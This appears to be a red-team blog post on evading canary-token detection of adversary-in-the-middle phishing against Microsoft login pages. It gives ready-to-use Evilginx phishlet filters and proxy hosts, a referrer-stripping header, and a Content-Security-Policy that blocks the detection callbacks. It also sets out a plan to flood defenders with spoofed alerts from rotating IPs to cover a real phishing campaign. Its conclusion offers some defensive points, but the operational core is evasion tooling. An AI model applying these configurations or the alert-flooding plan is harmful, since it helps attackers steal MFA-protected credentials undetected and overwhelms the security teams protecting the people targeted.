TL;DR
No real canaries were harmed during this research.
We cover 4 methods that can be used to bypass AiTM phishing detections based on JavaScript or CSS based callbacks on login pages:
- Just remove the parts that would trigger the detection using a regex replace
- Proxying the callbacks themselves
- Using the
Referrer-Policy
header to remove thereferer
header altogether- (Spoiler: We uncovered a bug in Chrome browsers that makes this technique fairly useless when the victim is using a Chromium browser)
- Using CSP policies to block all types of callback methods, regardless of the level of obfuscation used.
Additionally, a bonus method is shown which takes advantage of the inherent working of these detection mechanisms, turning it against itself by flooding it with bogus alerts.
Method | CSS Callbacks | JS Callbacks | Notes |
Regex Replace | ✅ | 〰️ | Depends on the level of obfuscation and is not a generic solution* |
Reverse proxying the callback | ✅ | 〰️ | Depends on the level of obfuscation and is not a generic solution* |
Referrer policy no-referrer | 〰️ | ❌ | Completely generic solution*. Chromium bug causes the referrer policy to be ignored when using the url() CSS function.JS Callbacks do not need to rely on the Referer header. |
Content Security Policy (CSP) | ✅ | ✅ | Generic solution* on a per-phishlet basis. |
Bonus: Alert flooding | ✅ | ✅ | Does not bypass alerts, but still very effective. |
These are also unaffected if changes are made to the callback URL or trigger method.
Introduction
As a red teamer, what I like about cyber security so much is the never-ending cat-and-mouse game between attackers and defenders, and how it stimulates creativity and ingenuity on both sides in devising solutions.
When we look at phishing for instance, the widespread adoption of MFA forced attackers to come up with new techniques such as Adversary-in-The-Middle (AiTM) and Device Code Phishing that would allow them to compromise accounts protected with MFA. For a long time, the offensive side has been able to use these techniques very effectively, giving us the impression that we were on the winning team.
Last year, defenders started to catch up by inserting JavaScript-based detection scripts in login pages that would trigger an alert when it detected it was being loaded from an unexpected domain name, which indicates an Adversary-in-The-Middle (AiTM) phishing attempt. The main problem with this approach is that a lot of 3rd party service providers (rightfully) do not allow custom JavaScript to be inserted into their login pages (which is the case for the highly targeted Microsoft login pages as well).
However, earlier this year, defenders found a very interesting way of detecting AiTM phishing attempts with only CSS (as first described by Zolder.io and later adopted by Thinkst Canary Tokens). The benefit of using this approach is that it works on a lot of 3rd party login pages which allow custom CSS for company branding (such as on Microsoft Entra ID login pages).
Very clever move! But now it is our turn again. Let’s play!
CSS Based Canary/Honey Tokens
To be able to understand the bypass methods described later, we first need to briefly summarize how these Canary/Honey tokens actually work. Feel free to skip this section if you already know this.
Let’s look at a simplified example of how this works in action when targeting an organization using a CSS-based honey token on their Microsoft Entra ID login page:
- The victim user clicks on a malicious link sending them to
malicious.com
on which a reverse proxy phishing tool (such as Evilginx) is running to clone the Microsoft login page (login.microsoftonline.com
). - Once the user fills in their email address, Microsoft will load the custom branding configured in the user’s tenant. In this case, the custom branding includes a custom CSS file in which a background image (
img.gif
) is defined. - The custom background image (
img.gif
) is located on a different non-proxied URL (i.e. the callback URL to the “Honey Server”), resulting in the browser directly trying to fetch it outside of the proxied session. - The Honey Server will check the
Referer
header that is present in the request from the user. If theReferer
matches a list of expected legitimate domains (e.g.login.microsoftonline.com
), then no action is taken. If it doesn’t, this most likely indicates an AiTM phishing attack, and an alert is created for the security team to investigate this further.
The only useful information the security team has at this point is the public IP address of the legitimate user and the phishing domain. With just the public IP address, the security team still does not know which user actually visited the malicious website, especially when the user is connecting from a generic public IP address of the company (e.g. if they are working from a big office or if they are connected through the company VPN). Although with decent endpoint, DNS, Firewall, and/or email logging, it should be straightforward to find which user(s) visited the malicious domain.
But most importantly, the blue team can now block the malicious domain to prevent any other users from being able to fall victim to phishing campaigns using this domain name.
The previous illustration is slightly simplified and reduced to get a basic understanding, which should be sufficient to understand the bypasses discussed in the rest of the blog post.
However, for those interested in diving a bit deeper into an actual tangible example, let’s look at how this works underneath for Microsoft Entra ID when combined with something like Canary Tokens. (This will also show you how to enumerate whether a tenant is using canary tokens or not from an unauthenticated perspective.)
When the user enters their email address on the login page, a POST request to the /common/GetCredentialType
endpoint is sent. This is where Microsoft actually returns the custom branding details which will transform the generic login page into a company-branded login page. Specifically, the customCssUrl
parameter will contain a tenant-specific URL on the aadcdn.msftauthimages.net
domain where the company-branded CSS is located.
Let’s see what these custom CSS files look like when a Canary Token is in place.
When you generate a CSS file from the Canary Tokens website, it should look something like this:
This CSS code will set a custom background image for the HTML body. The url()
CSS function is what actually results in a request being sent from the browser to the “Honey Server”. When using the free version of Thinkst Canary Tokens, this will usually be a random Amazon CloudFront domain, however, this could be any custom domain in theory.
When the browser attempts to request what it believes to be a background image, it will automatically disclose the phishing domain name in the Referer
header to the “Honey Server”. At this point, the Honey Server really has enough information to create an alert already since it has both the source IP of the victim and the phishing domain name.
Although Thinkst Canary Tokens specifically return an additional unnecessary redirect to a different website with the original referrer in the URL. As explained in their blog post, this is a design decision to reduce costs, although it is not necessary for detection.
Additionally, don’t focus too much on the very obvious domain name (canarytokens.com
) as this is also a different more random domain in the paid version, which can also be customized.
Finally, the image is retrieved, which in this case is just a white pixel.
Note that some more advanced implementations of this detection technique will, additionally to creating an alert, return a different background image when an AiTM phishing attack is detected, warning the user not to sign in to the page.
Bypass methods
During our research, we came up with four different ways to bypass both JavaScript and CSS-based detections of Adversary-in-The-Middle attacks.
Why so many? As you will see later, each technique has some benefits and drawbacks, and the method you want to use will depend on your target and your specific requirements. Additionally, nothing stops you from combining multiple techniques at once.
We will also showcase a bonus method at the end which is not really intended as a real bypass, although it will surely mess with the blue team.
- The regex way
- Proxying the reverse proxy detections
- No Referrer! Pretty please?
- Using Content Security Policies (CSP) to our advantage
- Bonus: Phishes everywhere
While we will use Evilginx with a Microsoft phishlet in the examples below, these techniques will apply to any website protected by any type of JavaScript or CSS-based honey tokens. At the end of the blog, we will provide a summary to show what techniques work best for which specific scenarios.
1. The regex way
This is probably the most straightforward method anyone will think of directly, so let’s start with this one.
Since we as attackers already have a Man-in-the-Middle position when the login page is returned, we have the ability to modify the response to our liking.
This means that predictable unobfuscated strings can easily be removed with a simple regex search and replace. However, this is also directly the biggest disadvantage of this technique; Slight modifications to the JavaScript or CSS which we want to remove will break/prevent this technique. Especially with JavaScript-based detections, where obfuscation can get really crazy very quickly.
Additionally, every organization can implement its honey tokens differently (with different JavaScript or CSS), which means that it might not always be possible to build a single phishlet for a website using this technique, that will work for all organizations.
Regardless, let’s look at how to achieve this anyway, as it might still be useful in some cases.
Microsoft is actually a little bit of a special one here, as the custom CSS is not defined on one of the domains of the login page itself (i.e. login.microsoftonline.com
), but instead on a domain that is commonly not proxied (i.e. aadcdn.msftauthimages.net
). We could actually add aadcdn.msftauthimages.net
as an additional host to be proxied and replace the CSS there, although a more convenient method would be to just remove the reference to the custom CSS URL on the subdomain that we are proxying.
This can easily be achieved with the following regex filter: "customCssUrl":".*?"
, and replacing all matches with the following string to mimic a configuration where no custom CSS has been defined: "customCssUrl":""
.
With Evilginx, this is as simple as adding the following sub_filter to your phishlet configuration:
sub_filters:
- {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: '"customCssUrl":".*?"', replace: '"customCssUrl":""', mimes: ['application/json']}
Note that you might not always have the option to simply clear the customCssUrl. Especially if an organization also defines other legitimate CSS inside the custom CSS file. In that case, you will need to proxy the aadcdn.msftauthimages.net
website as well, and use a more specific regex replacement such as the following to match on all background properties containing the url()
CSS function:
background:[\s]*url\(.*?\).*?[;}\n]
Once again, this is not a silver bullet that will work every time as there are countless other CSS properties supporting the url()
function as value which can be used by defenders for this purpose.
However, at this point, you might also just want to use a different technique, so let’s look at what else we can do.
2. Proxying the reverse proxy detections
The only reason why these detection techniques work, is because they assume that they are able to send an out-of-band request which is not proxied by the attacker.
So let’s use the very thing they want to detect, against the detection logic, to render it completely useless again.
If no obfuscation is used, this can be easily achieved in Evilginx by just adding the honey domain as a proxied domain (as well as all necessary domains in between the main login domain and the honey domain):
proxy_hosts:
# Original
- {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', is_landing: true}
- {phish_sub: 'www', orig_sub: 'www', domain: 'office.com', auto_filter: true, is_landing: false}
- {phish_sub: 'cdn', orig_sub: 'aadcdn', domain: 'msftauth.net', auto_filter: true, is_landing: false}
# Extra
- {phish_sub: 'cdnimages', orig_sub: 'aadcdn', domain: 'msauthimages.net', auto_filter: true}
- {phish_sub: 'cloudfront', orig_sub: 'dakg4cmpuclai', domain: 'cloudfront.net', auto_filter: true}
- {phish_sub: 'honey', orig_sub: '', domain: 'canarytokens.com', auto_filter: true}
Note that in this case, we are not even going to block the requests to the honey/canary tokens. Just proxying these requests through Evilginx with the auto_filter
feature will be sufficient to trick the Honey Server into thinking that it originated from a normal non-proxied authentication.
The downside of this method is once again that a little bit of obfuscation to hide the domain will make it a lot harder. However, since there are not many string obfuscation methods for pure CSS alone, this should still work as-is most of the time for CSS-based tokens.
3. No Referrer! Pretty please?
Due to how the CSS-based tokens work, they will only ever be able to depend on the Referer
header in order to detect whether the user is signing in from a legitimate domain or not.
So clearly this Referer
header being sent with every request is a problem that we want to get rid of. If something is bothering us, sometimes it suffices to just politely ask it to stop doing what is bothering us.
This is exactly what the Referrer-Policy
header can be used for. (Yes, the Referrer-Policy
header is spelled like this, while the Referer
header is spelled like that)
The Referrer-Policy
allows a website to specify how much information should be specified in the Referer
header in cross-origin requests. The default Referrer Policy used by most browsers has been strict-origin-when-cross-origin
for the last couple of years, which basically means that requests to other “origins” (i.e. domains) will only contain the scheme and domain name inside of the referer
header, but not the full URI path and query string. For example, if the URL is https://malicious.com/login?user-id=1
, the referer header in cross-origin requests will only contain the following: https://malicious.com/
.
Conveniently, there is also a Referrer Policy directive no-referrer
, which does exactly what it implies: Omit the referer
header in any request initiated from this web page.
There are a couple of ways how we can achieve this in practice. My personal preference is to use a different reverse proxy (such as Caddy or Nginx) in front of Evilginx, and inject a downstream header this way.
With Caddy, this can be achieved by adding the following line inside of the reverse_proxy
block in the Caddyfile:
header_down Referrer-Policy "no-referrer"
With nginx, you can add the following line in your configuration:
add_header Referrer-Policy "no-referrer" always;
If you don’t want to put a different reverse proxy in front of Evilginx, then you can add the following line in the /core/http_proxy.go
file inside the p.Proxy.OnResponse().DoFunc()
function (here for example):
resp.Header.Set("Referrer-Policy", "no-referrer")
This will force Evilginx to just set the Referrer-Policy: no-referrer
header in every single response, in all phishlets. (Don’t forget to recompile the source code!)
Alright, let’s test this in Firefox. As you can see in the following screenshot, this works great!
In the debug tools, the top of the request shows which Referrer Policy is applied to it. Since the no-referrer policy is applied, the Referer
header is completely omitted from the request.
At this point, the Honey Server knows nothing. Even if an empty Referer
header would be considered to be suspicious, there is not really any actionable action that can be taken at this point, since the domain name of the phishing infrastructure is not shared with the blue team.
This is perfect then right? Let’s just add this to every request and be done with this. Well, not really…
If we would test the same thing in a Chromium browser (such as Google Chrome, Microsoft Edge, …), then we would see that the Referer
header is still present.
We’ve really been breaking our heads over this for way too long, although eventually, we found the exact reason why this happens.
Turns out we unintentionally identified a bug in Chromium browsers that causes the Referrer Policy to be ignored for all requests initiated by the url()
CSS function.
Purely by chance, this is exactly what these Honey/Canary Tokens are using.
Well, I at least presume this was used without the knowledge of this random bug in Chromium browsers. But that’s okay, every good game involves at least a little bit of luck. 🍀
We reported this bug to the Chromium team, although, since it got categorized as a low-severity issue, it doesn’t seem like this is something that will be fixed any time soon. So for the time being, we can either pray that our target is not using a Chromium browser, or we are going to need a better solution.
Since it is still our turn to play, let’s look at a more “reliable” approach…
4. Using Content Security Policies (CSP) to our advantage
For the people who do some web app pentests from time to time, the Content Security Policy (CSP) should already be fairly familiar. The Content Security Policy is actually a security feature that allows a website to harden itself against client-side attacks such as XSS and Clickjacking.
In a CSP policy, a website can define from which locations various resources (such as JavaScript, Images, Style Sheets, etc…) can be loaded. (Among other things)
So by injecting one specific header, we can basically specify to which domains our phishing page is allowed to talk. Requests to any other locations would be silently blocked by the browser, meaning that from the perspective of the Honey Server, it is like the user did not visit the login page at all.
What is actually intended to be a security feature, can be used as a weapon against these callback requests. The irony…
Once again, we can use any approach described in the previous technique to insert a response header. Let’s look at an example for a Microsoft login phishlet.
Content Security Policy supports various directives to control different types of fetch methods. For instance, the img-src
directive allows to control from which location images can be loaded, while script-src
can be used to restrict JavaScript.
While we could define all of these directives one by one, a simpler solution is to use the default-src
directive, which acts as a fallback for all of the other fetch directives.
Let’s start by adding some generic values since we don’t want to break the functionality of the website:
self
- Allows loading resources from the current origin
data:
- Allows resources to be loaded from the data: scheme
unsafe-inline
- Allows inline scripts and CSS embedded in the page
unsafe-hashes
- Allows JavaScript to be executed through inline event handlers such as
onclick
,onload
, etc…
- Allows JavaScript to be executed through inline event handlers such as
We don’t know whether the previous is actually used by the Microsoft login page, although it doesn’t do any harm to us as these don’t trigger any automatic requests to the Honey Servers. If we don’t add these keywords to our CSP policy, and the website does use any of these features, then it would cause some issues. So better safe than sorry.
Next, we need to actually allow all our phishing subdomains. (Since these are proxied through Evilginx, there is no risk of a callback going through there). To be quick, we can just add a wildcard record for this:
*.malicious.com
Lastly, we want to allow all legitimate non-proxied domains from which resources are expected and allowed to be loaded. We can easily enumerate this by going through the normal login flow with the Network tab open in the built-in browser debugger.
aadcdn.msauthimages.net
aadcdn.msftauthimages.net
aadcdn.msauth.net
*.live.com
*.office.com
*.office.net
*.microsoft.com
Depending on whether your phishlet is configured to keep proxying the session after authentication or not, you might need to add some additional domains to ensure that the website is able to keep functioning correctly, although the wildcard domains at the end should cover quite a lot already.
This brings us to the final Content Security Policy header that can be inserted with Caddy as follows:
header_down Content-Security-Policy "default-src 'self' data: 'unsafe-inline' 'unsafe-hashes' 'unsafe-eval' *.malicious.com aadcdn.msauthimages.net aadcdn.msftauthimages.net aadcdn.msauth.net *.live.com *.office.com *.office.net *.microsoft.com"
Note: You can insert this response header any way you want, such as alternatively with Nginx or by modifying the Evilginx source code as described above. I also noticed this PR which allows you to define custom response headers from within a phishlet. I have not tested this, although if it works as described, this can also definitely be a nice solution since these CSP headers are something that you would want to define on a per phishlet-basis.
When we test this, we can see that the callback request for the “background image” defined in CSS (which would trigger the alert) is blocked by the browser since it violates the Content Security Policy, as indicated by the {blocked:csp}
status.
The CSP blocks are also visible in the console of the browser debugger, which can be useful when trying to figure out what to allow and what not. By starting with a restrictive Content Security Policy that blocks everything except the phishing domains, you can gradually add domains from which legitimate resources are loaded through trial and error until nothing (except possibly a honey token callback) is blocked anymore.
5. Bonus: Phishes everywhere
So far we’ve seen how we can prevent alerts from being created. But what if we just take a different approach? What if we do want to trigger some alerts? Like, a lot of them. All containing bogus information to drown the security team in a flood of alerts.
When used at a continuous rate over a long timeframe, this can potentially be used to mask alerts from an actual phishing attack. Surely this will cause analysts to be even more on edge right? Sure, but what are they going to do about it if we just keep this running for multiple days or even weeks before actually performing a real attack? As previously established, there are only two pieces of (useful) information the security team will receive in these types of alerts, and both of these can be easily influenced by an attacker:
- The malicious phishing domain name (through the HTTP
Referer
header)- This is just an HTTP header that can be easily spoofed by an attacker using a list of random domain names
- The source IP of the victim user visiting the phishing page
- We can route each request through a different source IP using something like fireprox for instance.
If we ensure that these two pieces of information are completely random, the security team will be unable to differentiate between real and bogus alerts.
For this proof of concept, we will use Burp Suite Intruder combined with the IP Rotate extension.
Depending on how aggressive you want to be, you can set the request delay higher or lower, but we will use about 5 requests per second in this demonstration.
For random domains, we have a couple of options. We could generate some random non-existing domain names, use a list of the top most common domains (such as CloudFlare’s top domains list), or search for a list of recently registered domains (such as this one).
We can load a request to the canary token callback endpoint in Burp Suite’s Intruder, and define the payload position in the Referer
header. As explained at the beginning of this post, Thinkst Canary Tokens use an unnecessary intermediary step with a redirect where the domain is also placed in a URI parameter, so we also replaced that one.
And then we click Start Attack.
From the perspective of the security team, this will look something like this. Hundreds of alerts are created within a couple of seconds. Since we are using the IP Rotate extension to forward all our requests through the Amazon API Gateway, we can see that a random IP will be used for almost every request.
Each alert will have a different domain name, so it is also not possible to filter out requests from a specific domain. In this case, it looks like Spotify is hosting a phishing page.
Specifically for Thinkst Canary Tokens, we noticed that some throttling of notifications eventually kicks in. When this occurs, alerts are still logged in the Canary Console itself, but it will stop sending out SMS messages, emails, and even webhook notifications about new alerts. At the start, this is only temporary, but if the throttling occurs more than 35 times in a week, then all notifications are permanently blocked, meaning that no alerts will be forwarded to a SIEM or monitored mailbox anymore from that point on.
Regardless of whether alert throttling kicks in or not, it doesn’t seem like the security team stands any chance of defending against something like this. Either they just disable all alerts for this canary token, or they are flooded with bogus alerts. Neither solution seems any better than the other. The only thing you can do at this point is change the callback URL and hope that the attacker doesn’t switch over to flooding that one.
Alternatively to drowning the security team in hundreds of fake alerts, a small amount of fake alerts could be triggered as a misdirection when you want to divert the attention of the security team elsewhere while something else is happening in the background.
This will surely send them on a wild goose chase for a while, trying to investigate where these alerts are coming from without finding any traces of connections to the malicious domains in any of the network logs.
If you are really evil, you could maybe even send some very obvious phishing emails containing links to the fake malicious domains to a big group of employees first, and then gradually keep triggering the canary token alerts from different source IPs. That should keep them busy for some time, resetting innocent user credentials out of precaution and digging through sign-in logs for anything out of the ordinary, all while you’re actually targeting completely different accounts using a more advanced pretext.
Heck, why not even send the email to the whole security team and make them wonder who of their colleagues actually fell for that, while each of them keeps persistently denying to have interacted with such an obvious phishing email? 🍿
Summary
We went over quite some techniques that can be used to interfere with these sneaky AiTM phishing detections. We mainly focussed on the newer CSS callbacks since that will be the most common in third-party login pages, although a lot of these techniques can also be used when dealing with JavaScript-based callbacks. However, because a lot more obfuscation can be done in JavaScript, this can drastically impact the feasibility of some of these techniques.
Method | CSS Callbacks | JS Callbacks | Notes |
Regex Replace | ✅ | 〰️ | Depends on the level of obfuscation and is not a generic solution* |
Reverse proxying the callback | ✅ | 〰️ | Depends on the level of obfuscation and is not a generic solution* |
Referrer policy no-referrer | 〰️ | ❌ | Completely generic solution*. Chromium bug causes the referrer policy to be ignored when using the url() CSS function.JS Callbacks do not need to rely on the Referer header. |
Content Security Policy (CSP) | ✅ | ✅ | Generic solution* on a per-phishlet basis. |
Bonus: Alert flooding | ✅ | ✅ | Does not bypass alerts, but still very effective. |
These are also unaffected if changes are made to the callback URL or trigger method.
If no obfuscation is used, creating a small regex or proxying some additional domains can be a quick solution that should work great for one specific target.
Until the Chromium bug causing the referrer policy to be ignored is not fixed, the no-referrer
technique will sadly not be that useful.
Overall, the CSP method seems to be the most reliable solution which can be set up once for a specific phishlet, and will keep on working for both CSS and JS-based callbacks. The same CSP policy should work for different tenants and regardless of the amount of obfuscation.
And if all else fails, you know what to do 😉
Conclusion
As with all defense in depth measures, these tokens are definitely not a silver bullet that will completely prevent these types of phishing attacks. However, that does not mean that these are useless either. Yes, they can be bypassed in several ways, although it still introduces additional effort for attackers to perform these bypasses. This is an extra cost that some threat actors just might not care to take into consideration or might lack knowledge about, at least catching some attacks. Additionally, even if attackers do choose to put in the extra effort, they might make a small error causing an alert to accidentally be created during testing or even during a live phishing campaign (for example due to a single typo in the regex, CSP policy, refer(r)er headers, …).
Regardless, it is still good to be aware of the capabilities of a sophisticated threat actor and know that an Adversary-in-the-Middle phishing attack should not be directly disregarded as a possible initial access vector during incident response, even if no alert was triggered.
I think this is a good time to call ‘Check’. Defenders, it’s your turn again. Will we finally see non-downgradable phishing-resistant authentication methods breaking through (passkeys)? Will we start encountering more well-configured, strict device- and location-based conditional access policies being used in large organizations? Or will we be surprised with something completely different to bridge the gap until the previous is actually widely implemented?
Time will tell. But for now, let’s enjoy this victory lap.